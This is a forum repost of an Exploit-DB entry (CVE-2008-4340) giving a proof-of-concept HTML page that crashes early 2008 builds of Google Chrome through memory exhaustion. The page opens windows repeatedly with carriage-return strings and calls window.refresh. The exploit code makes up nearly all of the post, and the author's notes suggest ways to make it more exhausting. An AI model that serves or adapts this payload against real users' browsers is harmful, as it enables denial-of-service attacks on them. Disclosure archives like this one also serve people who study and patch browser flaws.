Exploit Google Chrome - Carriage Return Null Object Memory Exhaustion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6554
Проверка EDB
  1. Пройдено
Автор
ADITYA K SOOD
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2008-4340
Дата публикации
2008-09-24
HTML:
<html>
<title>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.</title>
<head>
<script language="javascript">

window.open("\r\n\r\n");
window.refresh();
window.open("\r\n\r\n");


</script>
</head>

<body><br><br>
<h2><center>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Denial of Service.<br><br>Proof of Concept</br></br> </center></h2>


<center>
<b>Note:: Keep an eye on the memory consumption in Task Manager.</b><br><br>

<hr></hr>
<b>This POC has been designed with minimum object usage. This can be made more critical when combined with number of objects. For Example:
using alert function will make it more exhaustive.</b></br></br>

<b><br>Aditya K Sood<br> (c) SecNiche Security.<br><a href="http://www.secniche.org">http://www.secniche.org</a></br></b>
<hr></hr></center>
<b>Version Tested:<br><br>Official Build 1798<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br> AppleWebKit/525.13 (KHTML, like Gecko)<br> Chrome/0.2.149.29 Safari/525.13
 <br><br>

Official Build 2200<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) <br>AppleWebKit/525.13 (KHTML, like Gecko) <br>Chrome/0.2.149.30 Safari/525.13
</b>
<hr></hr>
</body>


</html>

# milw0rm.com [2008-09-24]
 
Источник
www.exploit-db.com

Похожие темы